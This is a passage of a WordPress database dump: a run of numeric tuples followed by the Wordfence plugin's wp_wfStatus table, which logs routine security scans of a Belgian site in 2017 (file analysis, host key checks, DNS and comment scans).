(24934273, 2160581054, 1),
(24934292, 2160581054, 1),
(24934296, 2160581054, 1),
(24934297, 2160581054, 1),
(24934302, 2160581054, 1),
(24934317, 1538375237, 2),
(24934333, 2160581054, 1),
(24934351, 2160581054, 1),
(24934364, 2160581054, 1),
(24934366, 2160581054, 1),
(24934373, 2160581054, 1),
(24934419, 2160581054, 1),
(24934420, 2160581054, 1),
(24934461, 2160581054, 1),
(24934504, 1374769563, 5),
(24934505, 1374769563, 5),
(24934505, 2160581054, 1),
(24934521, 1055638166, 1),
(24934612, 2297635928, 1),
(24934613, 2297635928, 2),
(24934691, 1374769563, 10),
(24934729, 1374841142, 6),
(24934730, 1374841142, 6),
(24934827, 1374761077, 1),
(24934885, 1834549080, 1),
(24935604, 3154485134, 10),
(24935671, 2857634197, 1),
(24935751, 3154485134, 10),
(24935949, 1538774996, 1),
(24936071, 1538656104, 12),
(24936208, 1374769563, 10),
(24936249, 3154459133, 10),
(24936300, 1837280593, 15),
(24936587, 2150924393, 1),
(24936917, 1582084616, 1),
(24936973, 1538728574, 2),
(24937078, 782622681, 1),
(24937241, 1374769563, 10),
(24937311, 2499535434, 1),
(24937326, 760206499, 1),
(24937482, 1539837611, 6),
(24937562, 1374769563, 10),
(24937569, 2499535434, 1),
(24937699, 844599434, 4),
(24937700, 844599434, 26),
(24938049, 2499535434, 1),
(24938179, 1314247995, 1),
(24938264, 1374769563, 10),
(24938636, 1538656104, 12),
(24938854, 1538656104, 12),
(24938927, 1538656104, 12),
(24939009, 2499535434, 1),
(24939021, 1374769563, 10),
(24939034, 1374769563, 10),
(24939035, 1374839056, 1),
(24939590, 1123635012, 1),
(24939680, 1374769563, 10),
(24939720, 1538614733, 1),
(24939910, 783487407, 10),
(24939935, 1538773687, 1),
(24940129, 1842251139, 1),
(24940677, 621390105, 1),
(24940682, 629981398, 1),
(24940683, 3569402886, 1),
(24940753, 1603019490, 1),
(24940824, 844599431, 1),
(24940829, 2918037896, 1),
(24940909, 3639891570, 1),
(24940929, 2499535434, 1),
(24940973, 629981398, 1),
(24940976, 1822917694, 1),
(24940988, 3097104020, 1),
(24941043, 1540278613, 1),
(24941114, 784084240, 1),
(24941194, 1538457750, 1),
(24941195, 1833311020, 1),
(24941200, 1428090969, 1),
(24941202, 1475089271, 1),
(24941235, 2996488203, 1),
(24941331, 1833311020, 1),
(24941332, 2915925356, 1),
(24941431, 3652605758, 1),
(24941712, 1833311020, 1),
(24941767, 1374769563, 10),
(24941768, 1796538632, 1),
(24941803, 2994779638, 1),
(24941876, 1426952777, 1),
(24941974, 2509961569, 1),
(24942124, 1837280593, 12),
(24942316, 1338303090, 1),
(24942610, 1374769563, 10),
(24942871, 3233510666, 2),
(24943175, 3325711418, 1),
(24943370, 1374769563, 20),
(24943447, 1837280593, 12),
(24943648, 1306362424, 1),
(24943966, 3326599946, 1),
(24943987, 3075492304, 1),
(24944039, 1121751541, 1),
(24944214, 1439300774, 1),
(24944214, 1121751540, 1),
(24944304, 3559909632, 1),
(24944338, 1355389335, 1),
(24944588, 1837280593, 12),
(24944737, 1837280593, 12),
(24944750, 1837280593, 2),
(24944769, 2499535434, 1),
(24944815, 1538596638, 3),
(24944815, 1374769563, 10),
(24945018, 1357743298, 1),
(24945286, 1137866330, 1),
(24945684, 2644818921, 2),
(24945881, 3567663235, 2),
(24946240, 1427778051, 1),
(24946262, 1374769563, 10),
(24946454, 3250485790, 1),
(24946614, 1581879465, 1),
(24947211, 2493725349, 1),
(24947394, 1519853770, 1),
(24947443, 1439241202, 1),
(24947505, 1538656104, 12),
(24947666, 1374769563, 10),
(24948076, 3373404845, 3),
(24948094, 1837270443, 1),
(24948366, 856654116, 1),
(24948411, 2065606982, 1),
(24948631, 3267064321, 1),
(24949064, 1374769563, 10),
(24949310, 856638264, 1),
(24949324, 1796538632, 1),
(24949842, 3154458345, 8),
(24949843, 3154458345, 2),
(24949968, 3649587542, 1),
(24950938, 1091807106, 8),
(24950939, 1091807106, 9),
(24950980, 1314254639, 1),
(24951032, 3065287714, 1),
(24951287, 1539836988, 1),
(24951315, 1538656104, 12),
(24951491, 1538656104, 5),
(24951492, 1538656104, 7),
(24951598, 2745986199, 1),
(24952052, 1374769563, 10),
(24952454, 2499535434, 1),
(24952955, 1123631300, 1),
(24953055, 1114560586, 1),
(24953058, 1374769563, 10),
(24953288, 2032808987, 1),
(24953395, 1837280593, 12),
(24953439, 1374769563, 10),
(24953586, 1837280593, 12),
(24954168, 3166510073, 3),
(24954261, 1439283878, 1),
(24954491, 3233510666, 1),
(24954780, 1538656104, 12),
(24954784, 1837280593, 12),
(24954831, 1122253362, 1),
(24954854, 1837280593, 12),
(24954890, 1538656104, 12),
(24954927, 1374769563, 10),
(24955005, 1837280593, 12),
(24955969, 3024883602, 1),
(24956031, 1374769563, 10),
(24956072, 3567663235, 3),
(24956352, 1374769563, 10),
(24956462, 1837280593, 15),
(24956502, 2835380908, 1),
(24956974, 1374769563, 10),
(24957057, 2745986199, 1),
(24957483, 1374769563, 10),
(24957491, 3346287885, 1),
(24957652, 1570674744, 1),
(24957655, 1538362361, 1),
(24957805, 90545271, 1),
(24957889, 3428697494, 1),
(24957890, 3428697494, 1),
(24958398, 2001500246, 1),
(24958539, 3233508538, 4),
(24958621, 1382193106, 1),
(24958723, 1332607321, 1),
(24958925, 1540872198, 1),
(24959010, 1834585734, 1),
(24959072, 84491800, 1),
(24959076, 1374769563, 10),
(24959186, 1374769563, 10),
(24959339, 1538615370, 1),
(24959356, 1467349730, 1),
(24959428, 1426773780, 1),
(24959696, 3107604753, 1),
(24959699, 757167658, 1),
(24959702, 88944456, 1),
(24959838, 1347353146, 1),
(24959838, 1138992850, 1),
(24959909, 3254831113, 1),
(24959918, 1123633540, 1),
(24959982, 1474632318, 1),
(24960057, 1833311020, 1),
(24960070, 1370060441, 10),
(24960155, 2342691993, 1),
(24960203, 84519249, 1),
(24960464, 3587417960, 3),
(24960482, 1374769563, 10),
(24960509, 876568582, 1),
(24960518, 3000613671, 4),
(24960519, 3000613671, 6),
(24960520, 3000613671, 2),
(24960716, 1833311020, 1),
(24960795, 3349724530, 1),
(24960993, 1728497228, 1),
(24961315, 1374769563, 10),
(24961449, 1382193114, 1),
(24961717, 533672141, 1),
(24961863, 1837280593, 12),
(24961885, 1374769563, 10),
(24961947, 1833311020, 1),
(24961949, 1370067079, 1),
(24962067, 1837280593, 12),
(24962131, 609542472, 1),
(24962247, 3226577416, 1),
(24962330, 1837280593, 12),
(24962392, 1467349730, 1),
(24962849, 1538656104, 12),
(24962864, 1371104126, 1),
(24962866, 1538361201, 1),
(24962932, 1833311020, 1),
(24962970, 1405240484, 1),
(24963082, 1568498493, 1),
(24963317, 621928491, 1),
(24963318, 1540872244, 1),
(24963335, 1837280593, 5),
(24963336, 1837280593, 7),
(24963336, 1475494039, 1),
(24963385, 1833311020, 1),
(24963477, 1297196331, 1),
(24963511, 1538656104, 12),
(24963514, 1838045613, 10),
(24963974, 846466161, 1),
(24964637, 919627301, 1),
(24964693, 1375116803, 1),
(24964923, 1837280593, 12),
(24965082, 1374769563, 10),
(24965102, 1834526758, 1),
(24965165, 1314231423, 1),
(24965825, 1374769563, 10),
(24965825, 632922577, 1),
(24965831, 1834596186, 1),
(24965860, 695169303, 1),
(24966066, 1834584698, 1),
(24966441, 3362685302, 1),
(24966449, 3362685302, 1),
(24966450, 3362685302, 1),
(24966453, 3362685302, 1),
(24966459, 3362685302, 1),
(24966464, 3362685302, 1),
(24966478, 3362685302, 1),
(24966484, 3362685302, 1),
(24966486, 3362685302, 1),
(24966491, 3362685302, 1),
(24966495, 3362685302, 1),
(24966496, 3362685302, 1),
(24966508, 3362685302, 1),
(24966512, 3362685302, 1),
(24966653, 675805702, 1),
(24967059, 3350653525, 1),
(24967133, 2783005766, 1),
(24967270, 1374769563, 10),
(24967650, 1834596186, 1),
(24967796, 2025603832, 1),
(24967814, 2499535434, 1),
(24967967, 1837280593, 12),
(24968449, 1837280593, 12),
(24969115, 1570674722, 1),
(24969150, 1464061315, 1),
(24969297, 1538656104, 12),
(24969890, 3564054600, 1),
(24969947, 1538615370, 1),
(24970039, 1834559909, 1),
(24970113, 3166542325, 3),
(24970122, 1374769563, 10),
(24970129, 1833311020, 1),
(24970506, 1374769563, 10),
(24970595, 1833311020, 1),
(24970600, 1540278570, 1),
(24970671, 1364734211, 1),
(24970722, 1374769563, 10),
(24970843, 1837280593, 12),
(24970874, 1123631300, 1),
(24970898, 96995098, 1),
(24971151, 1338305565, 1),
(24971227, 1539836988, 1),
(24971396, 1540872244, 1),
(24971418, 1837280593, 12),
(24971558, 1426857626, 1),
(24971589, 1834609551, 1),
(24971621, 3233512354, 5),
(24971780, 1833311020, 1),
(24971854, 2513094943, 1),
(24971950, 633042990, 3),
(24972015, 1475494060, 1),
(24972052, 774130777, 1),
(24972074, 2917938538, 1),
(24972150, 3275627538, 2),
(24972161, 1475494071, 1),
(24972194, 1121751542, 1),
(24972284, 1123631300, 1),
(24972288, 1123631300, 1),
(24972300, 3104081691, 1),
(24972302, 1123631300, 1),
(24972313, 632837775, 10),
(24972372, 1753276934, 1),
(24972755, 1311686202, 1),
(24972759, 1123631300, 1),
(24972859, 1538512053, 1),
(24972922, 1837280593, 12),
(24972935, 1538656104, 12),
(24973171, 1538615370, 1),
(24973196, 1571470175, 1),
(24973196, 1833311020, 1),
(24973199, 1592224796, 1),
(24973256, 2745986199, 1),
(24973412, 1374769563, 10),
(24973424, 3104599145, 1),
(24973445, 2999997207, 1),
(24974091, 1833311020, 1),
(24974195, 90545227, 1),
(24974202, 1789313226, 1),
(24974357, 919627301, 1),
(24974441, 2989642493, 1),
(24974558, 632900847, 1),
(24974568, 1463834777, 1),
(24974996, 1374769563, 10),
(24975155, 1374769563, 10),
(24975830, 1374769563, 1),
(24975883, 1834514215, 1),
(24976003, 1512198042, 1),
(24976107, 1374769563, 10),
(24976291, 919627301, 1),
(24976340, 1336759242, 1),
(24976434, 1837280593, 12),
(24976505, 1374769563, 10),
(24976590, 1538704198, 2),
(24976637, 1374769563, 10),
(24977163, 3569402886, 1),
(24977164, 3569402886, 1),
(24977250, 2513051914, 1),
(24977251, 2513051914, 1),
(24977253, 2513051914, 1),
(24977302, 2513061429, 1),
(24977620, 632818382, 10),
(24977681, 1374769563, 10),
(24980654, 1055650208, 1),
(24980702, 2342670828, 1),
(24980723, 1538656104, 12),
(24980747, 1439284595, 1),
(24980775, 1439284595, 1),
(24980869, 1374776940, 1),
(24981133, 620874844, 1),
(24981357, 621375751, 1),
(24981682, 1837280593, 12),
(24982116, 1837280593, 12),
(24982166, 1355389035, 1),
(24982337, 1355291200, 1),
(24982885, 1592839955, 1),
(24982977, 1837161381, 1),
(24983147, 1538656104, 12),
(24983196, 1375116379, 1),
(24983209, 1539836988, 1),
(24983233, 1539836988, 1),
(24983235, 3645212876, 1),
(24983261, 1538359134, 1),
(24983585, 1401346405, 1),
(24983687, 1837264142, 1),
(24984175, 3024883608, 1),
(24984533, 1168357651, 1),
(24984536, 1731763595, 1),
(24984591, 1463838565, 3),
(24984610, 3250520646, 1),
(24984611, 3250520646, 2),
(24984611, 533387461, 1),
(24984682, 2679407696, 1),
(24984734, 2783008843, 1),
(24984816, 1306279988, 1),
(24984825, 872401474, 1),
(24984856, 872366560, 1),
(24984915, 1055593041, 1),
(24985088, 1255137841, 1),
(24985425, 621375750, 1),
(24985709, 2509959072, 1),
(24985828, 1538655055, 2),
(24986023, 1837384990, 1),
(24986124, 3154492423, 10),
(24986145, 3281714082, 1),
(24986607, 1998438315, 1),
(24986777, 1439267802, 1),
(24987273, 1837384990, 1),
(24987285, 1837384990, 1),
(24987311, 1209777137, 1),
(24987311, 1374822686, 1),
(24987312, 1538774068, 1),
(24987314, 1374822686, 1),
(24987484, 1539836988, 1),
(24987587, 2783008843, 1),
(24987704, 1538595673, 1),
(24987788, 3281714082, 1),
(24987945, 783509116, 3),
(24987946, 783509116, 7),
(24988092, 1538595673, 1),
(24988672, 2995873941, 1),
(24988743, 3103966404, 1),
(24988743, 3249721826, 4),
(24988860, 1796538632, 1),
(24989178, 3373404845, 3),
(24989502, 1430848841, 1),
(24990263, 3251245561, 1),
(24990264, 3251245561, 1),
(24990438, 1838091214, 4),
(24990439, 1838091214, 6),
(24991002, 1538595673, 1),
(24991263, 1600959233, 1),
(24991312, 3110395569, 1),
(24991568, 3024883602, 1),
(24991727, 608921439, 1),
(24991759, 1538595673, 1),
(24992110, 1463832178, 10),
(24992278, 1463832178, 2),
(24992278, 632835177, 5),
(24992279, 632835177, 3),
(24992293, 632920713, 1),
(24992804, 1539836988, 2),
(24992870, 1054002081, 1),
(24993161, 783504431, 8),
(24993161, 3273261683, 2),
(24993201, 1123635081, 1),
(24993249, 1837838730, 1),
(24993672, 1123633613, 1),
(24993772, 1463832178, 10),
(24993910, 757138080, 1),
(24994627, 1463832178, 10),
(24994791, 1463832178, 10),
(24994837, 633034955, 1),
(24994855, 3107193141, 1),
(24994967, 1463832178, 10),
(24994974, 1463832178, 10),
(24995051, 919627301, 1),
(24995242, 620874844, 1),
(24995370, 1837280593, 12),
(24995554, 1123632645, 1),
(24995786, 1379793056, 1),
(24995952, 3273261687, 10),
(24996043, 2631448407, 1),
(24996180, 1837280593, 12),
(24996263, 3154445620, 10),
(24996315, 1375118415, 1),
(24996410, 1332604279, 1),
(24996490, 3281714082, 1),
(24996715, 1375113052, 20),
(24996750, 1532393936, 1),
(24997407, 1375113052, 5),
(24997408, 1375113052, 5),
(24997494, 1532393936, 1),
(24997648, 1463955851, 10),
(24998140, 1332604279, 1),
(24998199, 3325718858, 1),
(24998534, 2499535434, 1),
(24998689, 1539836988, 1),
(24999056, 1332604279, 1),
(24999072, 3250483965, 1),
(24999204, 3154453301, 10),
(24999345, 1538656104, 12),
(24999508, 1375113052, 10),
(24999919, 3657082077, 1),
(25000205, 3373404845, 5),
(25000234, 2342668003, 1),
(25000258, 3652607482, 1),
(25000677, 3649630461, 1),
(25000759, 1538656104, 12),
(25000825, 1538656104, 12),
(25001011, 1375113052, 10),
(25001192, 1837280593, 12),
(25001447, 3233512354, 4),
(25001654, 1538656104, 12),
(25002206, 1742919172, 15),
(25002206, 1742919169, 14),
(25002233, 1742919172, 1),
(25002255, 1742919169, 1),
(25002357, 1538656104, 12),
(25002398, 1538656104, 12),
(25002447, 1538656104, 12),
(25002454, 1538656104, 12),
(25002605, 1837280593, 12),
(25003136, 1374958463, 1),
(25003195, 1055643623, 1),
(25003308, 1539836988, 1),
(25003340, 1463849781, 1),
(25003395, 621928491, 1),
(25003605, 1540278299, 1),
(25004286, 3281714082, 1),
(25004982, 1375113052, 10),
(25005276, 1375113052, 10),
(25005325, 1375113052, 10),
(25005868, 3281714082, 1),
(25006001, 1538358128, 1),
(25006394, 3256705680, 1),
(25006545, 1052827874, 1),
(25006679, 1427857479, 1),
(25006700, 1375113052, 1),
(25006701, 1375113052, 9),
(25006798, 3024883471, 1),
(25007010, 1538592859, 1),
(25007260, 1539836988, 1),
(25007855, 1055643893, 2);

-- --------------------------------------------------------

--
-- Structure de la table `wp_wfStatus`
--

CREATE TABLE `wp_wfStatus` (
  `id` bigint(20) UNSIGNED NOT NULL,
  `ctime` double(17,6) UNSIGNED NOT NULL,
  `level` tinyint(3) UNSIGNED NOT NULL,
  `type` char(5) NOT NULL,
  `msg` varchar(1000) NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Déchargement des données de la table `wp_wfStatus`
--

INSERT INTO `wp_wfStatus` (`id`, `ctime`, `level`, `type`, `msg`) VALUES
(118136, 1492290942.757329, 10, 'info', 'SUM_FINAL:Scan complete. You have 6 new issues to fix. See below.'),
(117369, 1491943535.470579, 2, 'info', 'Analyzed 1000 files containing 13.31 MB of data so far'),
(117368, 1491943535.282504, 2, 'info', 'Analyzed 900 files containing 12.89 MB of data so far'),
(117367, 1491943535.002886, 2, 'info', 'Analyzed 800 files containing 10.45 MB of data so far'),
(117035, 1491750762.636499, 2, 'info', 'Starting scan of file contents'),
(117036, 1491750763.659355, 2, 'info', 'Scanned contents of 28 additional files at 27.39 per second'),
(117037, 1491750764.664138, 2, 'info', 'Scanned contents of 40 additional files at 19.73 per second'),
(117038, 1491750765.608326, 2, 'info', 'Scanned contents of 86 additional files at 28.94 per second'),
(117039, 1491750765.609197, 2, 'info', 'Asking Wordfence to check URL\'s against malware list.'),
(117040, 1491750765.610905, 2, 'info', 'Checking 59 host keys against Wordfence scanning servers.'),
(117041, 1491750766.458654, 2, 'info', 'Done host key check.'),
(117042, 1491750766.459760, 2, 'info', 'Checking 1 URLs from 1 sources.'),
(117205, 1491821934.460034, 2, 'info', 'Analyzed 2300 files containing 34.88 MB of data so far'),
(117410, 1491943546.642670, 2, 'info', 'Starting password strength check on 3 users.'),
(117704, 1492108229.559657, 2, 'info', 'Found 14 plugins'),
(117703, 1492108229.393172, 2, 'info', 'Getting plugin list from WordPress'),
(117702, 1492108228.517528, 1, 'info', 'Contacting Wordfence to initiate scan'),
(118204, 1492320259.590769, 10, 'info', 'SUM_ENDOK:Scanning posts for URL\'s in Google\'s Safe Browsing List'),
(118205, 1492320259.596038, 10, 'info', 'SUM_START:Scanning comments for URL\'s in Google\'s Safe Browsing List'),
(118203, 1492320259.572865, 2, 'info', 'Done examining URls'),
(118198, 1492320258.655249, 10, 'info', 'SUM_ENDOK:Scanning files for URLs in Google\'s Safe Browsing List'),
(118199, 1492320258.662800, 10, 'info', 'SUM_START:Scanning posts for URL\'s in Google\'s Safe Browsing List'),
(118200, 1492320258.698980, 2, 'info', 'Examining URLs found in posts we scanned for dangerous websites'),
(118201, 1492320258.705119, 2, 'info', 'Checking 6 host keys against Wordfence scanning servers.'),
(118202, 1492320259.571407, 2, 'info', 'Done host key check.'),
(117884, 1492265523.406181, 2, 'info', 'Found 4 themes'),
(117428, 1491988746.248769, 1, 'info', 'Scheduled Wordfence scan starting at Wednesday 12th of April 2017 09:19:06 AM'),
(117417, 1491943547.709762, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(117416, 1491943547.709141, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(117415, 1491943547.702207, 2, 'info', 'Scanning DNS A record for crosstrainingcenter.be'),
(117414, 1491943547.699341, 2, 'info', 'Scanning CNAME DNS record for www.crosstrainingcenter.be'),
(117413, 1491943547.698433, 2, 'info', 'Starting DNS scan for www.crosstrainingcenter.be'),
(117893, 1492265526.746451, 2, 'info', 'Analyzed 100 files containing 1.02 MB of data so far'),
(116952, 1491702317.195127, 2, 'info', 'Checking 59 host keys against Wordfence scanning servers.'),
(116961, 1491702318.963405, 2, 'info', 'Checking 6 host keys against Wordfence scanning servers.'),
(116953, 1491702318.066070, 2, 'info', 'Done host key check.'),
(117761, 1492108251.526786, 2, 'info', 'Done examining URls'),
(117760, 1492108251.526349, 2, 'info', 'Done host key check.'),
(116960, 1491702318.961621, 2, 'info', 'Examining URLs found in posts we scanned for dangerous websites'),
(117272, 1491886398.011599, 2, 'info', 'Analyzed 100 files containing 1.02 MB of data so far'),
(117273, 1491886398.274547, 2, 'info', 'Analyzed 200 files containing 2.51 MB of data so far'),
(116956, 1491702318.918813, 2, 'info', 'Done file contents scan'),
(117274, 1491886398.541811, 2, 'info', 'Analyzed 300 files containing 3.26 MB of data so far'),
(116954, 1491702318.068558, 2, 'info', 'Checking 1 URLs from 1 sources.'),
(116955, 1491702318.907870, 2, 'info', 'Done URL check.'),
(118029, 1492280432.016393, 10, 'info', 'SUM_START:Scanning comments for URL\'s in Google\'s Safe Browsing List'),
(118030, 1492280432.096740, 10, 'info', 'SUM_ENDOK:Scanning comments for URL\'s in Google\'s Safe Browsing List'),
(117705, 1492108229.564197, 2, 'info', 'Getting theme list from WordPress'),
(117706, 1492108229.608742, 2, 'info', 'Found 4 themes'),
(117402, 1491943545.675865, 2, 'info', 'Examining URLs found in posts we scanned for dangerous websites'),
(117916, 1492265536.041093, 2, 'info', 'Analyzed 2400 files containing 37.48 MB of data so far'),
(117905, 1492265530.818478, 2, 'info', 'Analyzed 1300 files containing 21.78 MB of data so far'),
(117906, 1492265531.127129, 2, 'info', 'Analyzed 1400 files containing 22.37 MB of data so far'),
(117907, 1492265531.319452, 2, 'info', 'Analyzed 1500 files containing 22.67 MB of data so far'),
(117908, 1492265531.766808, 2, 'info', 'Analyzed 1600 files containing 23.75 MB of data so far'),
(117909, 1492265532.116014, 2, 'info', 'Analyzed 1700 files containing 24.51 MB of data so far'),
(117910, 1492265533.270359, 2, 'info', 'Analyzed 1800 files containing 27.97 MB of data so far'),
(117911, 1492265534.545924, 2, 'info', 'Analyzed 1900 files containing 30.45 MB of data so far'),
(117912, 1492265534.920306, 2, 'info', 'Analyzed 2000 files containing 32.64 MB of data so far'),
(117913, 1492265535.152992, 2, 'info', 'Analyzed 2100 files containing 33.38 MB of data so far'),
(117914, 1492265535.516772, 2, 'info', 'Analyzed 2200 files containing 34.49 MB of data so far'),
(117915, 1492265535.755542, 2, 'info', 'Analyzed 2300 files containing 34.88 MB of data so far'),
(117662, 1492072420.506504, 2, 'info', 'Done host key check.'),
(117391, 1491943542.992328, 2, 'info', 'Scanned contents of 40 additional files at 19.47 per second'),
(118088, 1492290933.534632, 2, 'info', 'Analyzed 1900 files containing 30.52 MB of data so far'),
(117070, 1491750769.607819, 1, 'info', '-------------------'),
(117340, 1491943519.290776, 1, 'info', 'Scheduled Wordfence scan starting at Tuesday 11th of April 2017 08:45:19 PM'),
(117731, 1492108240.065961, 2, 'info', 'Analyzed 1700 files containing 24.51 MB of data so far'),
(117730, 1492108239.674139, 2, 'info', 'Analyzed 1600 files containing 23.75 MB of data so far'),
(118089, 1492290933.935482, 2, 'info', 'Analyzed 2000 files containing 32.64 MB of data so far'),
(118090, 1492290934.108393, 2, 'info', 'Analyzed 2100 files containing 33.38 MB of data so far'),
(118091, 1492290934.377098, 2, 'info', 'Analyzed 2200 files containing 34.49 MB of data so far'),
(118092, 1492290934.554513, 2, 'info', 'Analyzed 2300 files containing 34.88 MB of data so far'),
(117805, 1492193116.421013, 2, 'info', 'Analyzed 200 files containing 2.51 MB of data so far'),
(117804, 1492193116.148815, 2, 'info', 'Analyzed 100 files containing 1.02 MB of data so far'),
(117285, 1491886402.670356, 2, 'info', 'Analyzed 1400 files containing 22.37 MB of data so far'),
(117286, 1491886402.842688, 2, 'info', 'Analyzed 1500 files containing 22.67 MB of data so far'),
(117287, 1491886403.129051, 2, 'info', 'Analyzed 1600 files containing 23.75 MB of data so far'),
(118058, 1492290925.910273, 2, 'info', 'Getting plugin list from WordPress'),
(118059, 1492290925.923969, 2, 'info', 'Found 14 plugins'),
(118060, 1492290925.927564, 2, 'info', 'Getting theme list from WordPress'),
(118061, 1492290925.953736, 2, 'info', 'Found 4 themes'),
(118062, 1492290925.971866, 10, 'info', 'SUM_START:Fetching core, theme and plugin file signatures from Wordfence'),
(117816, 1492193120.302107, 2, 'info', 'Analyzed 1300 files containing 21.78 MB of data so far'),
(117815, 1492193119.874227, 2, 'info', 'Analyzed 1200 files containing 16.57 MB of data so far'),
(118024, 1492280431.118628, 2, 'info', 'Examining URLs found in posts we scanned for dangerous websites'),
(118023, 1492280431.076324, 10, 'info', 'SUM_START:Scanning posts for URL\'s in Google\'s Safe Browsing List'),
(117580, 1492058789.161984, 2, 'info', 'Examining URLs found in posts we scanned for dangerous websites'),
(117282, 1491886401.226873, 2, 'info', 'Analyzed 1100 files containing 15.03 MB of data so far'),
(117283, 1491886401.990081, 2, 'info', 'Analyzed 1200 files containing 16.57 MB of data so far'),
(117284, 1491886402.407973, 2, 'info', 'Analyzed 1300 files containing 21.78 MB of data so far'),
(117006, 1491750752.695505, 2, 'info', 'Analyzed 100 files containing 1.02 MB of data so far'),
(117370, 1491943535.745297, 2, 'info', 'Analyzed 1100 files containing 15.03 MB of data so far'),
(117371, 1491943536.040442, 2, 'info', 'Analyzed 1200 files containing 16.57 MB of data so far'),
(117372, 1491943536.415916, 2, 'info', 'Analyzed 1300 files containing 21.79 MB of data so far'),
(117373, 1491943536.589211, 2, 'info', 'Analyzed 1400 files containing 22.37 MB of data so far'),
(117374, 1491943536.735433, 2, 'info', 'Analyzed 1500 files containing 22.67 MB of data so far'),
(117375, 1491943536.958823, 2, 'info', 'Analyzed 1600 files containing 23.75 MB of data so far'),
(117376, 1491943537.186348, 2, 'info', 'Analyzed 1700 files containing 24.51 MB of data so far'),
(117377, 1491943537.944139, 2, 'info', 'Analyzed 1800 files containing 27.98 MB of data so far'),
(117378, 1491943538.738522, 2, 'info', 'Analyzed 1900 files containing 30.53 MB of data so far'),
(117487, 1491988779.343570, 2, 'info', 'Done file contents scan'),
(118065, 1492290929.968946, 10, 'info', 'SUM_ENDSUCCESS:Fetching list of known malware files from Wordfence'),
(118240, 1499280689.843379, 2, 'info', 'Scanning comment with Author: Ann Weaver Email: bjzhzk@fjiauool.com Source IP: 81.171.81.55 '),
(118241, 1499280689.903410, 2, 'info', 'Checking 5 host keys against Wordfence scanning servers.'),
(117513, 1491988782.035408, 1, 'info', '-------------------'),
(117514, 1491988782.035769, 1, 'info', 'Scan Complete. Scanned 2411 files, 14 plugins, 4 themes, 11 pages, 145 comments and 43923 records in 35 seconds.'),
(117784, 1492193101.472502, 1, 'info', 'Scheduled Wordfence scan starting at Friday 14th of April 2017 06:05:01 PM'),
(118164, 1492320247.312993, 2, 'info', 'Analyzed 700 files containing 7.41 MB of data so far'),
(118163, 1492320247.077389, 2, 'info', 'Analyzed 600 files containing 6.21 MB of data so far'),
(118162, 1492320246.820239, 2, 'info', 'Analyzed 500 files containing 4.95 MB of data so far'),
(117922, 1492265537.041796, 2, 'info', 'Starting scan of file contents'),
(117923, 1492265538.151796, 2, 'info', 'Scanned contents of 28 additional files at 25.24 per second'),
(118193, 1492320257.747117, 2, 'info', 'Done host key check.'),
(118192, 1492320256.882616, 2, 'info', 'Checking 59 host keys against Wordfence scanning servers.'),
(118194, 1492320257.748417, 2, 'info', 'Checking 1 URLs from 1 sources.'),
(118195, 1492320258.629653, 2, 'info', 'Done URL check.'),
(118196, 1492320258.649110, 2, 'info', 'Done file contents scan'),
(118197, 1492320258.650460, 10, 'info', 'SUM_ENDOK:Scanning file contents for infections and vulnerabilities'),
(118177, 1492320251.905827, 2, 'info', 'Analyzed 2000 files containing 32.64 MB of data so far'),
(118171, 1492320249.560198, 2, 'info', 'Analyzed 1400 files containing 22.37 MB of data so far'),
(118172, 1492320249.701162, 2, 'info', 'Analyzed 1500 files containing 22.67 MB of data so far'),
(118173, 1492320249.978579, 2, 'info', 'Analyzed 1600 files containing 23.75 MB of data so far'),
(118174, 1492320250.184421, 2, 'info', 'Analyzed 1700 files containing 24.51 MB of data so far'),
(118175, 1492320250.964384, 2, 'info', 'Analyzed 1800 files containing 27.97 MB of data so far'),
(118176, 1492320251.655383, 2, 'info', 'Analyzed 1900 files containing 30.52 MB of data so far'),
(118087, 1492290933.253231, 2, 'info', 'Analyzed 1800 files containing 27.97 MB of data so far'),
(118086, 1492290933.001307, 2, 'info', 'Analyzed 1700 files containing 24.51 MB of data so far'),
(118025, 1492280431.120644, 2, 'info', 'Checking 6 host keys against Wordfence scanning servers.'),
(117145, 1491767413.788436, 2, 'info', 'Starting password strength check on 3 users.'),
(117989, 1492280417.111075, 2, 'info', 'Analyzed 900 files containing 12.89 MB of data so far'),
(117990, 1492280417.304971, 2, 'info', 'Analyzed 1000 files containing 13.31 MB of data so far'),
(117991, 1492280418.078675, 2, 'info', 'Analyzed 1100 files containing 15.03 MB of data so far'),
(117992, 1492280418.558372, 2, 'info', 'Analyzed 1200 files containing 16.57 MB of data so far'),
(117575, 1492058789.078131, 2, 'info', 'Done URL check.'),
(117148, 1491767415.039708, 2, 'info', 'Starting DNS scan for www.crosstrainingcenter.be'),
(117576, 1492058789.090535, 2, 'info', 'Done file contents scan'),
(118026, 1492280431.990595, 2, 'info', 'Done host key check.'),
(116948, 1491702315.262297, 2, 'info', 'Scanned contents of 28 additional files at 27.69 per second'),
(117288, 1491886403.411314, 2, 'info', 'Analyzed 1700 files containing 24.51 MB of data so far'),
(117289, 1491886404.802971, 2, 'info', 'Analyzed 1800 files containing 27.97 MB of data so far'),
(116949, 1491702316.277614, 2, 'info', 'Scanned contents of 41 additional files at 20.23 per second'),
(117294, 1491886407.512527, 2, 'info', 'Analyzed 2300 files containing 34.88 MB of data so far'),
(117295, 1491886407.813124, 2, 'info', 'Analyzed 2400 files containing 37.51 MB of data so far'),
(117296, 1491886407.872411, 2, 'info', 'Analyzed 2411 files containing 37.68 MB of data.'),
(117943, 1492265542.985578, 2, 'info', 'Starting password strength check on 3 users.'),
(118232, 1495637412.261090, 2, 'info', 'Scanning comment with Author: Chelsea Wallace Email: hqklgtrqgwh@fvrmaw.com Source IP: 81.171.81.234 '),
(117946, 1492265544.126504, 2, 'info', 'Starting DNS scan for www.crosstrainingcenter.be'),
(117200, 1491821931.641106, 2, 'info', 'Analyzed 1800 files containing 27.97 MB of data so far'),
(117104, 1491767399.190569, 2, 'info', 'Analyzed 1100 files containing 15.03 MB of data so far'),
(117103, 1491767398.846755, 2, 'info', 'Analyzed 1000 files containing 13.31 MB of data so far'),
(117102, 1491767398.565648, 2, 'info', 'Analyzed 900 files containing 12.89 MB of data so far'),
(117101, 1491767398.215552, 2, 'info', 'Analyzed 800 files containing 10.45 MB of data so far'),
(117100, 1491767397.716284, 2, 'info', 'Analyzed 700 files containing 7.41 MB of data so far'),
(117099, 1491767397.358825, 2, 'info', 'Analyzed 600 files containing 6.21 MB of data so far'),
(118010, 1492280425.984358, 2, 'info', 'Starting scan of file contents'),
